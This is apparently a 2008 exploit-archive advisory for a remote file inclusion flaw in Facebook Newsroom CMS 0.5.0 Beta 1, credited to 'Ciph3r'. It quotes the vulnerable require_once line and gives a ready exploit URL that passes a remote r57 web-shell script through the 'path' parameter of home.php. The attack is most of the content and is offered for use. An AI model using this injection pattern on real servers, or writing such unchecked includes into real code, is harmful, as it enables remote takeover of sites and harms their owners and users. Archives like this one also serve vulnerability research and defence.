Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
# Published : 2008-07-11
# Author : Ciph3r
# Previous Title : File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
# Next Title : Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

#####################################################################
#
# Facebook Newsroom Application Remote File Inclusion Vulnerability
#
#####################################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP tanx4: Iranian hacker & Kurdish security TEAM
#
# sp TANX2: milw0rm.com & google.com & sourceforge.net
# 
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515    
#
# class : remote
#
# risk : high
#
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d 
#######################################################################
#
# C0de : 
#
#               
#    require_once ($path.'/classes/feedStories.class.php');
#
#
#######################################################################

 EXPLOIT :

 

 www.[Target].com/path/includes/home.php?path=[r57.txt?]


#######################################################################

# www.Syue.com [2008-07-11]